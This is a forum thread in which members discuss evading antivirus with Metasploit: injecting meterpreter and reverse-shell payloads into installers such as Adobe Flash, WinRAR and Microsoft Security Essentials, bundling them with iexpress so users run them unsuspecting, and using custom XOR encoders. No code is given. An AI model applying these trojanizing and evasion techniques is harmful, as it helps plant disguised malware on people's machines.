Results 1 to 8 of 8

Thread: Metasploit encoding

Hybrid View

  1. #1
    Junior Member
    Join Date
    Jun 2010
    Posts
    35

    Default Metasploit encoding

    Hello,

    metasploit is a great tool, but I have never been able yet to perfrorm a successful exploit because of my internet security program (Kaspersky). There are tons of tutorials to be found on the net about Metasploit, but none of them works without disabling Kaspersky.

    What I want to try is to donload a working exe from the internet, for example Skype, and inject this exe with the payload, and encoding it so it goes undetected.
    I tried to do this by altering the .text and .data parts with a PE editor. I added 500 bytes and made the .text executable and .data writable. Then I added 500 nullbytes with a HEX editor and tried to encode it. It says 'no encoders succeeded'

    I think I'm a bit on the wrong track here, but I can't seem to find well-written explanations about this. It is always assumed that you have an encodable .exe. But what if you have not?

    I'm not really asking for a complete tutorial, just point me in the right direction and i'll be happy..

    (you can go hard on me if im completely wrong in my thinking)

    thanks

  2. #2
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Metasploit encoding

    Have you tried encoding the payload you want, output it to an exe and then wrap them both together using iexpress in windows?

    I've had some success with this before but have never tested it against Kaspersky. I use a small program convert.exe that does basic conversions for you, used that with my encoded payload (as an exe) and used iexpress to package the two executables together. Then when I run my 'new' convert.exe (which has the hidden payload) I can get a shell.

    Not sure if this is where you're heading but it works well for me.

    Sickness did a sweet tutorial on this using the MSN Installer to hide the payload, search google for "backtrack iexpress" and you should find the first hit is his tutorial.

    Hope that helps somewhat.

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: Metasploit encoding

    Skype is not a good thing to practice with. Skype actually uses a form of a packer to create their legit binary. Its a very odd method, however, it makes it exceedingly difficult to inject a payload into it. I would suggest working with the adobe flash installer or some thing along those lines.

  4. #4
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: Metasploit encoding

    I tested the adobe flash installer injected with a meterpreter reverce tcp. It worked on my windows xp professional sp3 and didn't get detected by AVG AV but it didn't work on windows 7 home premium (It didn't get dedected by AVG AV but it just didn't work.). I have had some succes with injecting the meterpreter reverse tcp payload into winrar or in the microsoft security essentials installer. A quick google search should give you the exes.

  5. #5
    Junior Member
    Join Date
    Jun 2010
    Posts
    35

    Default Re: Metasploit encoding

    thank you all for the answers. Im pretty sceptical about being able to circumvent Kaspersky, but ill check out the methods that you guys suggested.

    One question though, if I try adobe flash installer, do i also have to put the two exes together with iexpress, or will it just work?
    Im a bit confused why for some exes the encoding just works, and for some I need to combine the payload exe with the real exe.
    On top of that, I thought that I read somewhere that I should adapt the .text and .data fields of the exe with a PE editor.

    Some suggested reading on this, or is it just different for every exe?

    Thanks

  6. #6
    Junior Member laptopz's Avatar
    Join Date
    Dec 2010
    Posts
    55

    Default Re: Metasploit encoding

    Using a small staged payload might give you better chances of evading...something like windows/shell/reverse_tcp
    If anything can go wrong, it will....

  7. #7
    Senior Member
    Join Date
    Jul 2010
    Location
    UK
    Posts
    136

    Default Re: Metasploit encoding

    I think it depends on what payload you start with in the first place. As laptopz said you have better chance using windows/shell/reverse_tcp because I don't think it contains the 'signature' that most AV's look for, plus it's less code to scan. From there you could move to meterpreter etc.

    Combining the payload with another exe like adobe flash installer like purehate says is a good way of getting the end user to run your payload because it looks less suspicious than some random executable.

    Checkout Metasploit Unleashed - There's some good info on binary payloads and av bypass.

  8. #8
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default Re: Metasploit encoding

    The only reason you should need to edit the .exe with a PE editor is if you are doing some custom AV stuff. If using metasploit to encode a exe file it is done for you. For example in 2008 muts did a talk at shmoocon called "I piss on your AV" . In this talk he created a custom XOR loop which encoded the binary to avoid AV detection. This is essentially the same thing the metasploit encoders do. For that type of thing you would want to use a PE editor. It is always really good to learn how to do these things manually to understand whats happening. I use the metasploit encoders as well however I have done it manually many times. The other good part about knowing how to do it manually is that with a cursory amount of assembly knowledge you can create a encoder no one else has and then you will truly be able to by pass AV. I have 2 I will never share and they beat all AVs all the time.

Similar Threads

  1. Creating and encoding a Metasploit meterpreter payload
    By TAPE in forum BackTrack Videos
    Replies: 0
    Last Post: 06-12-2010, 12:27 AM
  2. Text encoding recognizing/converting
    By caballero in forum OLD Newbie Area
    Replies: 0
    Last Post: 08-03-2008, 03:58 AM
  3. Recognize this encoding?
    By thorin in forum OLD Pentesting
    Replies: 8
    Last Post: 02-05-2008, 06:07 PM
  4. HDD install - Set language/encoding permanently
    By Huegel in forum OLD BT3beta General
    Replies: 4
    Last Post: 01-27-2008, 08:30 PM
  5. Edimax EW-7108pcg wifi encoding
    By yoshx in forum OLD Newbie Area
    Replies: 7
    Last Post: 07-24-2007, 12:37 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •